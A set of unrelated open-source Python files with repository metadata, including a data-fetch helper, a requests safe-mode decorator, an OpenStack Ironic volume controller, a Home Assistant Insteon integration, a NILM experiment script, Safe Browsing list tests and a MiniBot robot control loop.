:param dict percept: percept metadata
:return: percept data
:rtype: file
"""
return self.read(percept.locator, percept.credentials)
def read(self, url, credentials=None):
"""
Reads data from the specified URL, returning it as an open file-like object with a :py:func:`contextlib.closing` wrapper
:param str url: URL containing data
:param str credentials: optional name of configuration section with S3 credentials
"""
parsed = urlsplit(url)
if not parsed.netloc:
return open(parsed.path, 'rb')
if parsed.scheme == 's3':
s3 = DefaultS3Client(self._config, parsed.netloc, credentials)
data = s3.get(parsed.path)
else:
data = urllib2.urlopen(url)
if data is None:
return None
return contextlib.closing(data)
def remove(self, url, credentials=None):
"""
Removes percept data at the given path. Does not make any changes to the database; this is generally meant to be used by the :py:meth:`destroy` method, though it is available for other purposes.
:param str url: URL for the location of the percept
:param str credentials: optional name of configuration section with S3 credentials
.. todo::
Currently, only local and S3 files are supported.
"""
parsed = urlsplit(url)
if not parsed.netloc:
# Local file
os.unlink(parsed.path)
elif parsed.scheme == 's3':
s3 = DefaultS3Client(self._config, parsed.netloc, credentials)
s3.delete(parsed.path)
else:
raise NotImplementedError("Files not in a local repository or S3 bucket can't be deleted")
def destroy(self, percept, session):
"""
Removes a percept from the database, and its data from the repository.
:param percept: either a :py:class:`~rigor.types.Percept` object, or an integer identifier
:param session: database session
"""
if not hasattr(percept, 'id'):
percept = session.query(Percept).get(percept)
session.delete(percept)
self.remove(percept.locator, percept.credentials)
class ImageOps(PerceptOps):
"""
Utilities for dealing with image-type percepts
:param config: configuration data
:type config: :py:class:`~rigor.config.RigorConfiguration`
"""
def __init__(self, config):
super(ImageOps, self).__init__(config)
def fetch(self, percept):
"""
Given a percept, this will fetch its data from the URL or repository base,
returning it as a NumPy array
:param dict percept: Percept metadata
:return: decoded bitmap
:rtype: :py:class:`numpy.ndarray`
"""
with super(ImageOps, self).fetch(percept) as image_data:
return ImageOps.decode(image_data)
@staticmethod
def decode(percept_data):
"""
Given an image, this will decode it and return it as a NumPy array.
:param percept_data: image data or path to image file
:type percept_data: either a file-like object, or a path to an image file
:return: decoded bitmap
:rtype: :py:class:`numpy.ndarray`
"""
if hasattr(percept_data, 'read'):
image_array = np.frombuffer(percept_data.read(), np.uint8)
return cv2.imdecode(image_array, _kImageReadFlags)
return cv2.imread(percept_data, _kImageReadFlags)
|
{
"content_hash": "7ff464999dfd0b708f825d73449a58b4",
"timestamp": "",
"source": "github",
"line_count": 127,
"max_line_length": 196,
"avg_line_length": 29.95275590551181,
"alnum_prop": 0.7268664563617245,
"repo_name": "blindsightcorp/rigor",
"id": "0d62d858fa1255623a09b5289c0e5e8d53e5185b",
"size": "3804",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "lib/perceptops.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Mako",
"bytes": "494"
},
{
"name": "PHP",
"bytes": "1109"
},
{
"name": "Python",
"bytes": "132419"
}
],
"symlink_target": ""
}
|
"""
requests.safe_mode
~~~~~~~~~~~~
This module contains a decorator that implements safe_mode.
:copyright: (c) 2012 by Kenneth Reitz.
:license: ISC, see LICENSE for more details.
"""
from .models import Response
from .packages.urllib3.response import HTTPResponse
from .exceptions import RequestException, ConnectionError, HTTPError
import socket
def catch_exceptions_if_in_safe_mode(function):
"""New implementation of safe_mode. We catch all exceptions at the API level
and then return a blank Response object with the error field filled. This decorator
wraps request() in api.py.
"""
def wrapped(method, url, **kwargs):
# if save_mode, we catch exceptions and fill error field
if (kwargs.get('config') and kwargs.get('config').get('safe_mode')) or (kwargs.get('session')
and kwargs.get('session').config.get('safe_mode')):
try:
return function(method, url, **kwargs)
except (RequestException, ConnectionError, HTTPError,
socket.timeout, socket.gaierror) as e:
r = Response()
r.error = e
r.raw = HTTPResponse() # otherwise, tests fail
r.status_code = 0 # with this status_code, content returns None
return r
return function(method, url, **kwargs)
return wrapped
|
{
"content_hash": "540d20e724090a06c613279a7a3d91d6",
"timestamp": "",
"source": "github",
"line_count": 38,
"max_line_length": 101,
"avg_line_length": 37,
"alnum_prop": 0.6251778093883357,
"repo_name": "splunk/splunk-webframework",
"id": "0fb8d7052adcb894d940db7874e633ed934dfcdb",
"size": "1431",
"binary": false,
"copies": "65",
"ref": "refs/heads/master",
"path": "contrib/requests/requests/safe_mode.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "1808"
},
{
"name": "CSS",
"bytes": "122646"
},
{
"name": "HTML",
"bytes": "113362"
},
{
"name": "JavaScript",
"bytes": "5135595"
},
{
"name": "Python",
"bytes": "6298367"
},
{
"name": "Shell",
"bytes": "1368"
}
],
"symlink_target": ""
}
|
from oslo_log import log as logging
import pecan
from pecan import rest
from six.moves import http_client
import wsme
from ironic.api.controllers import base
from ironic.api.controllers import link
from ironic.api.controllers.v1 import utils as api_utils
from ironic.api.controllers.v1 import volume_connector
from ironic.api.controllers.v1 import volume_target
from ironic.api import expose
from ironic.common import exception
from ironic.common import policy
LOG = logging.getLogger(__name__)
class Volume(base.APIBase):
"""API representation of a volume root.
This class exists as a root class for the volume connectors and volume
targets controllers.
"""
links = wsme.wsattr([link.Link], readonly=True)
"""A list containing a self link and associated volume links"""
connectors = wsme.wsattr([link.Link], readonly=True)
"""Links to the volume connectors resource"""
targets = wsme.wsattr([link.Link], readonly=True)
"""Links to the volume targets resource"""
@staticmethod
def convert(node_ident=None):
url = pecan.request.public_url
volume = Volume()
if node_ident:
resource = 'nodes'
args = '%s/volume/' % node_ident
else:
resource = 'volume'
args = ''
volume.links = [
link.Link.make_link('self', url, resource, args),
link.Link.make_link('bookmark', url, resource, args,
bookmark=True)]
volume.connectors = [
link.Link.make_link('self', url, resource, args + 'connectors'),
link.Link.make_link('bookmark', url, resource, args + 'connectors',
bookmark=True)]
volume.targets = [
link.Link.make_link('self', url, resource, args + 'targets'),
link.Link.make_link('bookmark', url, resource, args + 'targets',
bookmark=True)]
return volume
class VolumeController(rest.RestController):
"""REST controller for volume root"""
_custom_actions = {
'attach': ['POST'],
'detach': ['DELETE'],
}
_subcontroller_map = {
'connectors': volume_connector.VolumeConnectorsController,
'targets': volume_target.VolumeTargetsController
}
def __init__(self, node_ident=None):
super(VolumeController, self).__init__()
self.parent_node_ident = node_ident
@expose.expose(Volume)
def get(self):
if not api_utils.allow_volume():
raise exception.NotFound()
cdict = pecan.request.context.to_policy_values()
policy.authorize('baremetal:volume:get', cdict, cdict)
return Volume.convert(self.parent_node_ident)
@expose.expose(Volume)
def attach(self, volume_id, connector_uuid, node_id=None):
cdict = pecan.request.context.to_policy_values()
policy.authorize('baremetal:volume:attach_volume', cdict, cdict)
rpc_node = api_utils.get_rpc_node(node_ident)
topic = pecan.request.rpcapi.get_topic_for(rpc_node)
return pecan.request.rpcapi.attach_volume(pecan.request.context,
volume_id,
connector_uuid,
node_id,
topic)
@expose.expose(Volume)
def detach(self, volume_id, node_id=None):
cdict = pecan.request.context.to_policy_values()
policy.authorize('baremetal:volume:detach_volume', cdict, cdict)
rpc_node = api_utils.get_rpc_node(node_ident)
topic = pecan.request.rpcapi.get_topic_for(rpc_node)
return pecan.request.rpcapi.detach_volume(pecan.request.context,
volume_id,
node_id)
@pecan.expose()
def _lookup(self, subres, *remainder):
if not api_utils.allow_volume():
pecan.abort(http_client.NOT_FOUND)
subcontroller = self._subcontroller_map.get(subres)
if subcontroller:
return subcontroller(node_ident=self.parent_node_ident), remainder
|
{
"content_hash": "43c75cdbf0918a2675ba4682af10bbc4",
"timestamp": "",
"source": "github",
"line_count": 121,
"max_line_length": 79,
"avg_line_length": 35.049586776859506,
"alnum_prop": 0.5963216222589012,
"repo_name": "ruyang/ironic",
"id": "9b2eb8447fa30e10bdeafe2980f2d0aa65b7fae8",
"size": "4851",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ironic/api/controllers/v1/volume.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Mako",
"bytes": "349"
},
{
"name": "Python",
"bytes": "5133461"
},
{
"name": "Shell",
"bytes": "107097"
}
],
"symlink_target": ""
}
|
"""Support for INSTEON Modems (PLM and Hub)."""
import asyncio
import logging
from pyinsteon import async_close, async_connect, devices
from homeassistant.config_entries import SOURCE_IMPORT
from homeassistant.const import CONF_PLATFORM, EVENT_HOMEASSISTANT_STOP
from homeassistant.data_entry_flow import RESULT_TYPE_CREATE_ENTRY
from homeassistant.exceptions import ConfigEntryNotReady
from .const import (
CONF_CAT,
CONF_DIM_STEPS,
CONF_HOUSECODE,
CONF_OVERRIDE,
CONF_SUBCAT,
CONF_UNITCODE,
CONF_X10,
DOMAIN,
INSTEON_COMPONENTS,
ON_OFF_EVENTS,
)
from .schemas import convert_yaml_to_config_flow
from .utils import (
add_on_off_event_device,
async_register_services,
get_device_platforms,
register_new_device_callback,
)
_LOGGER = logging.getLogger(__name__)
async def async_id_unknown_devices(config_dir):
"""Send device ID commands to all unidentified devices."""
await devices.async_load(id_devices=1)
for addr in devices:
device = devices[addr]
flags = True
for name in device.operating_flags:
if not device.operating_flags[name].is_loaded:
flags = False
break
if flags:
for name in device.properties:
if not device.properties[name].is_loaded:
flags = False
break
# Cannot be done concurrently due to issues with the underlying protocol.
if not device.aldb.is_loaded or not flags:
await device.async_read_config()
await devices.async_save(workdir=config_dir)
async def async_setup_platforms(hass, config_entry):
"""Initiate the connection and services."""
tasks = [
hass.config_entries.async_forward_entry_setup(config_entry, component)
for component in INSTEON_COMPONENTS
]
await asyncio.gather(*tasks)
for address in devices:
device = devices[address]
platforms = get_device_platforms(device)
if ON_OFF_EVENTS in platforms:
add_on_off_event_device(hass, device)
_LOGGER.debug("Insteon device count: %s", len(devices))
register_new_device_callback(hass)
async_register_services(hass)
device_registry = await hass.helpers.device_registry.async_get_registry()
device_registry.async_get_or_create(
config_entry_id=config_entry.entry_id,
identifiers={(DOMAIN, str(devices.modem.address))},
manufacturer="Smart Home",
name=f"{devices.modem.description} {devices.modem.address}",
model=f"{devices.modem.model} (0x{devices.modem.cat:02x}, 0x{devices.modem.subcat:02x})",
sw_version=f"{devices.modem.firmware:02x} Engine Version: {devices.modem.engine_version}",
)
# Make a copy of addresses due to edge case where the list of devices could change during status update
# Cannot be done concurrently due to issues with the underlying protocol.
for address in list(devices):
try:
await devices[address].async_status()
except AttributeError:
pass
await async_id_unknown_devices(hass.config.config_dir)
async def close_insteon_connection(*args):
"""Close the Insteon connection."""
await async_close()
async def async_import_config(hass, conf):
"""Set up all of the config imported from yaml."""
data, options = convert_yaml_to_config_flow(conf)
# Create a config entry with the connection data
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": SOURCE_IMPORT}, data=data
)
# If this is the first time we ran, update the config options
if result["type"] == RESULT_TYPE_CREATE_ENTRY and options:
entry = result["result"]
hass.config_entries.async_update_entry(
entry=entry, options=options,
)
return result
async def async_setup(hass, config):
"""Set up the Insteon platform."""
if DOMAIN not in config:
return True
conf = config[DOMAIN]
hass.async_create_task(async_import_config(hass, conf))
return True
async def async_setup_entry(hass, entry):
"""Set up an Insteon entry."""
if not devices.modem:
try:
await async_connect(**entry.data)
except ConnectionError as exception:
_LOGGER.error("Could not connect to Insteon modem")
raise ConfigEntryNotReady from exception
hass.bus.async_listen_once(EVENT_HOMEASSISTANT_STOP, close_insteon_connection)
await devices.async_load(
workdir=hass.config.config_dir, id_devices=0, load_modem_aldb=0
)
for device_override in entry.options.get(CONF_OVERRIDE, []):
# Override the device default capabilities for a specific address
address = device_override.get("address")
if not devices.get(address):
cat = device_override[CONF_CAT]
subcat = device_override[CONF_SUBCAT]
devices.set_id(address, cat, subcat, 0)
for device in entry.options.get(CONF_X10, []):
housecode = device.get(CONF_HOUSECODE)
unitcode = device.get(CONF_UNITCODE)
x10_type = "on_off"
steps = device.get(CONF_DIM_STEPS, 22)
if device.get(CONF_PLATFORM) == "light":
x10_type = "dimmable"
elif device.get(CONF_PLATFORM) == "binary_sensor":
x10_type = "sensor"
_LOGGER.debug(
"Adding X10 device to Insteon: %s %d %s", housecode, unitcode, x10_type
)
device = devices.add_x10_device(housecode, unitcode, x10_type, steps)
asyncio.create_task(async_setup_platforms(hass, entry))
return True
|
{
"content_hash": "648bef4c22881c15ce5cd27f5d2763f6",
"timestamp": "",
"source": "github",
"line_count": 166,
"max_line_length": 107,
"avg_line_length": 34.102409638554214,
"alnum_prop": 0.6587175410704822,
"repo_name": "titilambert/home-assistant",
"id": "62032b681b83099d1e27b42133cabcd774995d2f",
"size": "5661",
"binary": false,
"copies": "1",
"ref": "refs/heads/dev",
"path": "homeassistant/components/insteon/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "1488"
},
{
"name": "Python",
"bytes": "25849092"
},
{
"name": "Shell",
"bytes": "4410"
}
],
"symlink_target": ""
}
|
from __future__ import print_function, division
from neuralnilm import Net, RealApplianceSource, BLSTMLayer, SubsampleLayer, DimshuffleLayer
from lasagne.nonlinearities import sigmoid, rectify
from lasagne.objectives import crossentropy
from lasagne.init import Uniform, Normal
from lasagne.layers import LSTMLayer, DenseLayer, Conv1DLayer, ReshapeLayer
from lasagne.updates import adagrad, nesterov_momentum
from functools import partial
"""
Setup:
* in_to_cell init weights are now Normal(1.0)
* output all appliances
* fix bug in RealApplianceSource
* use cross-entropy
* smaller network
* power targets
* trying without first two sigmoid layers.
* updated to craffel/nntools commit 097aca480d60fdfada513c20070f8132d71a26b0
which fixes LSTM bug.
https://github.com/craffel/nntools/commit/097aca480d60fdfada513c20070f8132d71a26b0
* Subsampling *bidirectional* LSTM
* Output every sequence in the batch
* Change W_in_to_cell from Normal(1.0) to Uniform(5)
* put back the two sigmoid layers
* use Conv1D to create a hierarchical subsampling LSTM
* Using LSTM (not BLSTM) to speed up training while testing
* Use dimshuffle not reshape
* 2 dense layers back
* back to default init
* conv between LSTMs.
* More data
* BLSTM
* Try just using a 1D convnet on input
* add second Convnet layer (not sure this is correct thing to do?)
* third conv layer
* large inits
* back to 2 conv layers
e70
* Based on e65
* Using sigmoid instead of rectify in Conv1D layers
e71
* Larger layers
* More data
e72
* At a third conv layer
e73
* Add a dense layer after 3 conv layers
e74
* Removed dense layer after 3 conv layers (because it failed to learn anything)
* Trying standard inits for weights and biases throughout network.
e75
* Putting back large init for first layer
e76
* Removed 3rd conv layer
e77
* Try init Uniform(1)
e78
* Back to large inits for first layers
* Trying 3rd conv layer, also with large init
e79
* Trying to merge 1D conv on bottom layer with hierarchical subsampling
from e59a.
* Replace first LSTM with BLSTM
* Add second BLSTM layer
* Add conv1d between BLSTM layers.
e80
* Remove third 1d conv layer
e81
* Change num_filters in conv layer between BLSTMs from 20 to 80
e83
* Same net as e81
* Using different appliances, longer seq, and validation on house 5
(unseen during training!) Might be unfair because, for example,
house 1 doesn't use its washer dryer in drying mode ever but it
house 5 does.
* Using a seq_length of 4000 resulted in NaNs very quickly.
Dropping to 2000 resulted in NaNs after 100 epochs
1000 resulted in Nans after 4500 epochs
e83b
* Back to seq_length of 2000, modified net.py so it called IPDB
if train error is NaN or > 1
e83c
* Changed inits to standard values to try to stop NaN train costs
Results: I let it run for a little over 100 epochs. No Nans. But
wasn't learning anything very sane.
e83d
* Uniform(1)
e83e
* Try adagrad
e84
* Trying to find minimial example which gets NaNs
RESULT: Blows up after 19 epochs! Yay!
e85
* Try adagrad
RESULTS at different learning rates:
* 1 goes to NaN within 2 epochs ;(
* 0.01 went to NaN in 13 epochs
* 0.0001 doesn't go to NaN after 1000 epochs and may even be starting to learning something!
* 0.001 (e)85b doesn't go to NaN about >140 epochs
e86
* Trying larger network again (with adagrad with learning rate 0.001)
* Doesn't go to NaN (after >770 epochs) and learns something very vaguely useful
but not great. At all. Doesn't discriminate between appliances.
e87
* Network like e82. Just LSTM -> Conv -> LSTM -> Dense.
* More data
e88
* Train and validate just on house 1
e89
* try nesterov_momentum but with learning rate 0.01
Results
"""
source = RealApplianceSource(
filename='/data/dk3810/ukdale.h5',
appliances=[
['fridge freezer', 'fridge', 'freezer'],
'kettle',
'dish washer',
['washer dryer', 'washing machine'],
'microwave'
],
max_appliance_powers=[300, 3000, 2500, 2400, 2000],
on_power_thresholds=[80, 200, 20, 600, 100],
min_on_durations=[60, 10, 300, 300, 10],
window=("2013-05-22", "2015-01-01"),
seq_length=2000,
output_one_appliance=False,
boolean_targets=False,
min_off_duration=60,
subsample_target=5,
train_buildings=[1],
validation_buildings=[1]
)
net = Net(
experiment_name="e89",
source=source,
save_plot_interval=50,
loss_function=crossentropy,
updates=partial(nesterov_momentum, learning_rate=0.001),
layers_config=[
{
'type': LSTMLayer, # TODO change to BLSTM
'num_units': 60,
'W_in_to_cell': Uniform(5)
},
{
'type': DimshuffleLayer,
'pattern': (0, 2, 1)
},
{
'type': Conv1DLayer,
'num_filters': 80,
'filter_length': 5,
'stride': 5,
'nonlinearity': sigmoid
},
{
'type': DimshuffleLayer,
'pattern': (0, 2, 1)
},
{
'type': LSTMLayer,
'num_units': 80,
'W_in_to_cell': Uniform(5)
},
{
'type': DenseLayer,
'num_units': source.n_outputs,
'nonlinearity': sigmoid
}
]
)
net.print_net()
net.compile()
net.fit()
|
{
"content_hash": "75b62fa9cbc34f911a9b9b8bd38d433c",
"timestamp": "",
"source": "github",
"line_count": 203,
"max_line_length": 92,
"avg_line_length": 26.211822660098523,
"alnum_prop": 0.6829543318925014,
"repo_name": "JackKelly/neuralnilm_prototype",
"id": "e1228d814516634df28f1c16361f91e89a66a438",
"size": "5321",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "scripts/e89.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "4536723"
}
],
"symlink_target": ""
}
|
"""Unittest for googlesafebrowsing.sblist."""
import sblist
import server
import util
import unittest
class ListTest(unittest.TestCase):
def assertSameElements(self, a, b):
a = sorted(list(a))
b = sorted(list(b))
self.assertEqual(a, b, 'Expected: [%s], Found: [%s]' %
(', '.join(map(str, a)), ', '.join(map(str, b))))
def setUp(self):
self._list = sblist.List('goog-malware-shavar')
self._list.AddPrefix('aprefix', 1)
self._list.AddPrefix('bprefix', 2)
self._list.AddPrefix('aprefix', 3)
self._list.AddPrefix('cprefix', 1)
self._list.AddPrefix('0000', 4)
self.assertTrue(self._list.AddFullHash('0000fullhash', 4, 10))
self._list.AddPrefix('dprefix', 5)
self._list.AddEmptyAddChunk(5) # should remove dprefix
self._list.AddPrefix('eprefix', 6)
self._list.AddPrefix('fprefix', 6)
# After this add chunk 6 should still be around
self.assertTrue(self._list.RemovePrefix('eprefix', 1, 6))
self._list.AddPrefix('gprefix', 7)
self._list.AddPrefix('hprefix', 8)
self.assertTrue(self._list.RemovePrefix('gprefix', 2, 7))
self.assertTrue(self._list.RemovePrefix('hprefix', 2, 8))
# Subs for adds we have not yet received.
self.assertFalse(self._list.RemovePrefix('iprefix', 2, 11))
self.assertFalse(self._list.RemovePrefix('jprefix', 2, 12))
# Test prefix matching
self._list.AddPrefix('prefixaa', 9)
self._list.AddPrefix('prefixab', 9)
self._list.AddPrefix('prefixaa', 10)
self._list.AddEmptySubChunk(3)
# Add some empty sub chunks to see that we would support fragmentation.
self._list.AddEmptySubChunk(5)
self._list.AddEmptySubChunk(6)
self._list.AddEmptySubChunk(7)
def testGetRangeStr(self):
sbl = sblist.List('foo')
s = sbl._GetRangeStr([1, 2, 3, 4])
self.assertEqual(s, '1-4')
s = sbl._GetRangeStr([1, 2, 4, 5, 7, 8, 9, 10, 11, 13, 15, 17])
self.assertEqual(s, '1-2,4-5,7-11,13,15,17')
s = sbl._GetRangeStr([1])
self.assertEqual(s, '1')
def testName(self):
self.assertEqual('goog-malware-shavar', self._list.Name())
def testGetSetUpdateTime(self):
self.assertEqual(None, self._list.UpdateTime())
self._list.SetUpdateTime(42)
self.assertEqual(42, self._list.UpdateTime())
def testAddChukMap(self):
self.assertSameElements([1, 2, 3, 4, 5, 6, 7, 8, 9, 10],
self._list.AddChunkMap())
self.assertSameElements(['aprefix', 'cprefix'],
self._list.AddChunkMap()[1])
self.assertSameElements(['bprefix',], self._list.AddChunkMap()[2])
self.assertSameElements(['aprefix',], self._list.AddChunkMap()[3])
self.assertSameElements(['0000',], self._list.AddChunkMap()[4])
self.assertSameElements([], self._list.AddChunkMap()[5])
self.assertSameElements(['fprefix',], self._list.AddChunkMap()[6])
self.assertSameElements([], self._list.AddChunkMap()[7])
self.assertSameElements([], self._list.AddChunkMap()[8])
self.assertSameElements(['prefixaa', 'prefixab'],
self._list.AddChunkMap()[9])
self.assertSameElements(['prefixaa'], self._list.AddChunkMap()[10])
def testSubChunkMap(self):
self.assertSameElements([1, 2, 3, 5, 6, 7],
self._list.SubChunkMap())
self.assertEqual(0, len(self._list.SubChunkMap()[1]))
self.assertSameElements([sblist.SubEntry('iprefix', 2, 11),
sblist.SubEntry('jprefix', 2, 12)],
self._list.SubChunkMap()[2])
self.assertSameElements([], self._list.SubChunkMap()[3])
self.assertSameElements([], self._list.SubChunkMap()[5])
self.assertSameElements([], self._list.SubChunkMap()[6])
self.assertSameElements([], self._list.SubChunkMap()[7])
def testNumPrefixes(self):
self.assertEqual(9, self._list.NumPrefixes())
def testGotAddChunk(self):
for i in [1, 2, 3, 4, 5, 6, 7]:
self.assertTrue(self._list.GotAddChunk(i))
self.assertFalse(self._list.GotAddChunk(100))
def testGotSubChunk(self):
for i in [1, 2, 3, 5, 6, 7]:
self.assertTrue(self._list.GotSubChunk(i))
self.assertFalse(self._list.GotSubChunk(4))
def testAddFullHash(self):
# The prefix must be present in the list.
self.assertFalse(self._list.AddFullHash('noprefix', 4, 10))
self.assertTrue(self._list.AddFullHash('0000full', 4, 42))
entry = sblist.AddEntry('0000', 4, '0000full')
self.assertSameElements([entry], self._list.GetPrefixMatches('0000'))
def testAddPrefix(self):
# This should return false because this add chunk is already subbed.
self.assertFalse(self._list.AddPrefix('iprefix', 11))
# Test adding a prefix to a new chunk.
self.assertTrue(self._list.AddPrefix('asdf', 10))
entry = sblist.AddEntry('asdf', 10)
self.assertSameElements([entry], self._list.GetPrefixMatches('asdfasdf'))
self.assertSameElements([entry], self._list.GetPrefixMatches('asdf'))
# Test adding a prefix to an existing chunk.
self.assertTrue(self._list.AddPrefix('asdfasdf', 3))
other_entry = sblist.AddEntry('asdfasdf', 3)
self.assertSameElements([entry, other_entry],
self._list.GetPrefixMatches('asdfasdf'))
# Check to see if it supports full hashes correctly.
fullhash = util.GetHash256('asdf')
self.assertTrue(self._list.AddPrefix(fullhash, 11))
self.assertEqual(1, len(list(self._list.GetPrefixMatches(fullhash))))
def testRemovePrefix(self):
# Can't remove non existent prefix.
self.assertFalse(self._list.RemovePrefix('some_prefix', 8, 1))
# Remove first of two prefixes.
self.assertTrue(self._list.RemovePrefix('aprefix', 8, 1))
entry = sblist.AddEntry('aprefix', 3)
self.assertSameElements([entry], self._list.GetPrefixMatches('aprefix'))
# Remove second prefix.
self.assertTrue(self._list.RemovePrefix('aprefix', 8, 3))
self.assertSameElements([], self._list.GetPrefixMatches('aprefix'))
def testDeleteAddChunk(self):
# Delete add chunk that does not exist.
self.assertFalse(self._list.DeleteAddChunk(11))
# Delete empty add chunk
self.assertTrue(self._list.DeleteAddChunk(5))
self.assertFalse(self._list.GotAddChunk(5))
self.assertSameElements([], self._list.GetPrefixMatches('dprefix'))
# Delete normal add chunk
self.assertTrue(self._list.DeleteAddChunk(1))
self.assertFalse(self._list.GotAddChunk(1))
entry = sblist.AddEntry('aprefix', 3)
self.assertSameElements([entry], self._list.GetPrefixMatches('aprefix'))
self.assertSameElements([], self._list.GetPrefixMatches('cprefix'))
def testDeleteSubChunk(self):
# Delete sub chunk that does not exist.
self.assertFalse(self._list.DeleteSubChunk(8))
# Delete empty sub chunk.
self.assertTrue(self._list.DeleteSubChunk(7))
self.assertFalse(self._list.GotSubChunk(7))
# Delete non-empty sub chunk
self.assertTrue(self._list.DeleteSubChunk(2))
self.assertFalse(self._list.GotSubChunk(2))
def testDownloadRequest(self):
self.assertEqual('goog-malware-shavar;a:1-10:s:1-3,5-7',
self._list.DownloadRequest(False))
self.assertEqual('goog-malware-shavar;a:1-10:s:1-3,5-7:mac',
self._list.DownloadRequest(True))
# Make sure that this works properly on an empty list as well
list = sblist.List("empty-testing-list")
self.assertEqual('empty-testing-list;', list.DownloadRequest(False))
self.assertEqual('empty-testing-list;mac', list.DownloadRequest(True))
def testGetPrefixMatches(self):
self.assertSameElements([self._list.AddChunkMap()[9]['prefixaa'],
self._list.AddChunkMap()[10]['prefixaa']],
self._list.GetPrefixMatches('prefixaa'))
self.assertSameElements([self._list.AddChunkMap()[9]['prefixaa'],
self._list.AddChunkMap()[10]['prefixaa']],
self._list.GetPrefixMatches('prefixaaasdfasdf'))
self.assertSameElements([], self._list.GetPrefixMatches('prefixa'))
self.assertSameElements([self._list.AddChunkMap()[9]['prefixab']],
self._list.GetPrefixMatches('prefixabasdasdf'))
class SubEntryTest(unittest.TestCase):
def testAccessors(self):
entry = sblist.SubEntry('hash_prefix', 1, 2)
self.assertEqual('hash_prefix', entry.Prefix())
self.assertEqual(1, entry.SubNum())
self.assertEqual(2, entry.AddNum())
class AddEntryTest(unittest.TestCase):
def testSimple(self):
# Test with no full-hash.
entry = sblist.AddEntry('prefix', 1)
self.assertEqual('prefix', entry.Prefix())
self.assertEqual(None, entry.FullHash())
self.assertEqual(None, entry.GetHashTimestamp())
self.assertEqual(1, entry.AddChunkNum())
# Now set a full-hash and check that the accessors return the right thing.
entry.SetFullHash('fullhash', 42)
self.assertEqual('fullhash', entry.FullHash())
self.assertEqual(42, entry.GetHashTimestamp())
# Test with full-hash
entry = sblist.AddEntry('another_prefix', 2, 'fullhash')
self.assertEqual('another_prefix', entry.Prefix())
self.assertEqual('fullhash', entry.FullHash())
self.assertEqual(None, entry.GetHashTimestamp())
self.assertEqual(2, entry.AddChunkNum())
if __name__ == '__main__':
unittest.main()
|
{
"content_hash": "c84c1979ca26d636a47992034a56bb43",
"timestamp": "",
"source": "github",
"line_count": 234,
"max_line_length": 78,
"avg_line_length": 40.14957264957265,
"alnum_prop": 0.6623736029803087,
"repo_name": "robertobarreda/django-safe-browsing",
"id": "3c520f7e004dd2d3a51e7086aeb4f2fe70b84bc3",
"size": "9999",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "safebrowsing/vendors/google/tests/sblist_test.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "39279"
}
],
"symlink_target": ""
}
|
"""
Script which is automatically run on the MiniBot's Pi upon startup.
Must be configured in /etc/init.d/minibotinit.sh on the RPi.
"""
from minibot.bot import Bot
from minibot.hardware.communication.TCP import TCP
import minibot.hardware.communication.UDP
import json
from threading import Thread
import time
import importlib
import os
"""
Loads UserScript file.
Reloads file when it is run from GUI to reflect changes.
"""
US = importlib.import_module('minibot.scripts.UserScript')
CONFIG_LOCATION = '/home/pi/cs-minibot/minibot/configs/config.json'
p = None
def main():
print("Initializing Minibot Software")
p = None
config_file = open(CONFIG_LOCATION)
config = json.loads(config_file.read())
bot = Bot(config)
tcpInstance = TCP()
print(tcpInstance)
thread_udp = Thread(target= minibot.hardware.communication.UDP.udpBeacon)
thread_udp.start()
while True:
tcpCmd = tcpInstance.get_command()
parse_command(tcpCmd, bot)
time.sleep(0.01)
def parse_command(cmd, bot):
"""
Parses command sent by SendKV via TCP to the bot.
Sent from BaseStation.
Args:
cmd (:obj:`str`): The command name.
bot (:obj:`Bot`): Bot object to run the command on.
p (:obj:`str`): Payload or contents of command.
"""
global p
comma = cmd.find(",")
start = cmd.find("<<<<")
end = cmd.find(">>>>")
key = cmd[start + 4:comma]
value = cmd[comma + 1:end]
if key == "WHEELS":
try:
values = value.split(",")
bot.set_wheel_power(int(values[0]), int(values[1]))
except Exception as e:
print(e)
print("oh no!")
pass
elif key == "SCRIPT":
user_script_file = open("/home/pi/cs-minibot/minibot/scripts/UserScript.py",'w')
val = process_string(value)
user_script_file.write(val)
user_script_file.close()
p = spawn_script_process(p, bot)
elif key == "RUN":
filename = os.path.basename(value)
filepath = "/home/pi/cs-minibot/minibot/scripts/" + filename
print(filepath)
if os.path.isfile(filepath):
p = spawn_named_script_process(p, bot, filename.split('.')[0])
else:
print("Invalid File path")
else:
bot.extraCMD.put( (key, value) )
# Copy script sent from GUI into 'run' command
# So we can call that method to initiate the commands
def process_string(value):
cmds = value.splitlines()
str = "def run(bot):\n"
for i in range(len(cmds)):
str += " " +cmds[i] + "\n"
return str
def spawn_script_process(p, bot):
time.sleep(0.1)
p = Thread(target=run_script, args=[bot])
p.start()
return p
# Return control to main after .1 seconds
def spawn_named_script_process(p,bot,script_name):
time.sleep(0.1)
p = Thread(target=run_script_with_name, args=[bot,script_name])
p.start()
# Return control to main after .1 seconds
return p
def run_script_with_name(bot,script_name):
UserScript = importlib.import_module("scripts." + script_name)
UserScript.run(bot)
def run_script(bot):
UserScript = importlib.reload(US)
UserScript.run(bot)
if __name__ == "__main__":
main()
|
{
"content_hash": "1304c01435d1eb5b23848075cf8f865f",
"timestamp": "",
"source": "github",
"line_count": 115,
"max_line_length": 88,
"avg_line_length": 28.48695652173913,
"alnum_prop": 0.6217948717948718,
"repo_name": "cornell-cup/cs-minibot",
"id": "d900d835d533062a0f3d2c59883c9630d8bb38c3",
"size": "3276",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "minibot/main.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C++",
"bytes": "21918"
},
{
"name": "CSS",
"bytes": "5490"
},
{
"name": "HTML",
"bytes": "12057"
},
{
"name": "JavaScript",
"bytes": "93959"
},
{
"name": "Makefile",
"bytes": "231"
},
{
"name": "Python",
"bytes": "93494"
},
{
